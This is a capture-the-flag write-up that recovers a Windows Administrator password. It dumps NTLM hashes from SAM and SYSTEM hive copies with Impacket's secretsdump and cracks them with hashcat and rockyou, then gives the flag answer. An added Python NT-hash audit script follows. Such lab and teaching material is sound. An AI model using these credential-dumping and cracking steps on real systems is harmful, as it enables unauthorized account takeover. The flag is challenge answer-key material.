Statement: The attacker managed to gain Domain Admin on our rebels Domain Controller! Looks like they managed to log on with an account using WMI and dumped some files.

Can you reproduce how they got the Administrator's password with the artifacts provided?

Place the Administrator Account’s Password in DUCTF{}, e.g. DUCTF{password123!}


The challenge provides the files system.bak and sam.bak, i.e. copies of the SYSTEM and SAM registry hives. The SAM hive stores the local account hashes, and the SYSTEM hive holds the boot key needed to decrypt them, so recovering the Administrator password should be a matter of extracting the hash from these two files and cracking it.

To do this, I use Impacket's secretsdump tool with the LOCAL target, which parses the hives offline instead of a live machine:

# impacket-secretsdump -sam sam.bak -system system.bak LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0xa88f47504785ba029e8fa532c4c9e27b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:476b4dddbbffde29e739b618580adb1e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

The LM field is the well-known "empty" LM hash (aad3b435b51404eeaad3b435b51404ee), so only the NT hash is usable. I take the Administrator account's NT hash and run a dictionary attack on it with hashcat (mode 1000 = NTLM, attack mode 0 = straight wordlist):

hashcat -a 0 -m 1000 "476b4dddbbffde29e739b618580adb1e" /usr/share/wordlists/rockyou.txt

After 3 seconds, the password is recovered:

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

476b4dddbbffde29e739b618580adb1e:!checkerboard1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 476b4dddbbffde29e739b618580adb1e
Time.Started.....: Fri Jul  5 15:47:41 2024 (3 secs)
Time.Estimated...: Fri Jul  5 15:47:44 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5164.2 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14340096/14344385 (99.97%)
Rejected.........: 0/14340096 (0.00%)
Restore.Point....: 14338048/14344385 (99.96%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !petey! -> !carragold!
Hardware.Mon.#1..: Util: 34%

Started: Fri Jul  5 15:47:41 2024
Stopped: Fri Jul  5 15:47:45 2024

Flag: DUCTF{!checkerboard1}
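As an added illustration (not part of the original write-up), here is the check the cracking step performs, written as a small password-audit script a defender could run over a secretsdump export: it parses the two hash lines above, flags the empty LM hash (LM storage disabled), and tests each NT hash against a constructed banned-password list standing in for rockyou.txt. The MD4 implementation is included only because Python builds on OpenSSL 3 often no longer expose md4 in hashlib.

```python
import struct
MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is disabled

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing on OpenSSL 3 builds."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            r, j = divmod(i, 16)  # round number, step within the round
            if r == 0:
                f, k, s, t = (b & c) | (~b & d), j, (3, 7, 11, 19)[j % 4], 0
            elif r == 1:
                f, k, s, t = (b & c) | (b & d) | (c & d), (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:
                f, k, s, t = b ^ c ^ d, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[j], (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a, b, c, d = d, _rotl((a + f + x[k] + t) & MASK, s), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password (no salt), hex encoded."""
    return md4(password.encode("utf-16-le")).hex()

def parse_secretsdump_line(line: str) -> dict:
    """Split one 'user:rid:lmhash:nthash:::' line as printed by secretsdump."""
    user, rid, lm, nt = line.strip().rstrip(":").split(":")
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(), "lm_disabled": lm.lower() == EMPTY_LM}

def find_weak_password(nt_hex: str, candidates):
    """Return the first candidate whose NT hash equals nt_hex, or None (banned-password audit)."""
    return next((p for p in candidates if nt_hash(p) == nt_hex.lower()), None)

# Constructed sample input: the two secretsdump lines from the write-up plus a tiny banned-password list.
SAM_LINES = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:476b4dddbbffde29e739b618580adb1e:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
]
BANNED = ["password123!", "Welcome1", "!checkerboard1", ""]

def audit(lines=SAM_LINES, banned=BANNED) -> dict:
    """Map each account to the banned password its NT hash matches (None if no match)."""
    return {e["user"]: find_weak_password(e["nt"], banned) for e in map(parse_secretsdump_line, lines)}
```

audit() returns {'Administrator': '!checkerboard1', 'Guest': ''}: the Guest hash is that of an empty password, and the Administrator hash matches the banned entry just as hashcat reported.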